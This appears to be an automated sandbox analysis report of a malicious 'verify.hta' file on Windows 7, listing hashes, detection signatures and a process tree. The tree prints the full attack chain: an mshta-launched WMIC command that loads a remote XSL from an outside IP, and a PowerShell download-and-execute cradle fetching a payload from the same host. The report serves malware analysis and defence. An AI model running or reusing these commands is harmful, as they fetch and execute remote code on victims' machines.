Analysis

  • max time kernel
    117s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 14:14

General

  • Target

    verify.hta

  • Size

    2KB

  • MD5

    37ca0a9229af22173e81d6ace1f49a3f

  • SHA1

    7b15c031a6673d2d48d045d750e0ef17df1ed46f

  • SHA256

    e1781322c82511bd2859999c9627453450f2e68cc7c76b20a3893820b99e3b19

  • SHA512

    fc6af18e2fc1c4602de7bcfff1c4ea233bda838a144bd2c13e3daf3ef5c79639d876a502881b340cd6646e1ecf7ed917b6e4f0a9f11c77128811671fbf6a1edb

Malware Config

Signatures

  • Blocklisted process makes network request 10 IoCs
  • A potential corporate email address has been identified in the URL: [email protected]
  • Detected potential entity reuse from brand GOOGLE.
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\verify.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2624
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo os get /format:"http://3.140.250.70/WMI.xsl" | C:\Windows\System32\wbem\WMIC.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1600
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo os get /format:"http://3.140.250.70/WMI.xsl" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2464
      • C:\Windows\SysWOW64\wbem\WMIC.exe
        C:\Windows\System32\wbem\WMIC.exe
        3⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2476
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /b echo iex((New-Object Net.WebClient).DownloadString('http://3.140.250.70/payloade')) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2628
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" start /b echo iex((New-Object Net.WebClient).DownloadString('http://3.140.250.70/payloade')) "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2592
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K echo iex((New-Object Net.WebClient).DownloadString('http://3.140.250.70/payloade'))
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1236
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -
            5⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:620
    • C:\Windows\SysWOW64\timeout.exe
      "C:\Windows\System32\timeout.exe" /T 2 /nobreak
      2⤵
      • System Location Discovery: System Language Discovery
      • Delays execution with timeout.exe
      PID:408
    • C:\Windows\SysWOW64\timeout.exe
      "C:\Windows\System32\timeout.exe" /T 1 /nobreak
      2⤵
      • System Location Discovery: System Language Discovery
      • Delays execution with timeout.exe
      PID:2348

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\favicon[1].ico

    Filesize

    5KB

    MD5

    f3418a443e7d841097c714d69ec4bcb8

    SHA1

    49263695f6b0cdd72f45cf1b775e660fdc36c606

    SHA256

    6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

    SHA512

    82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563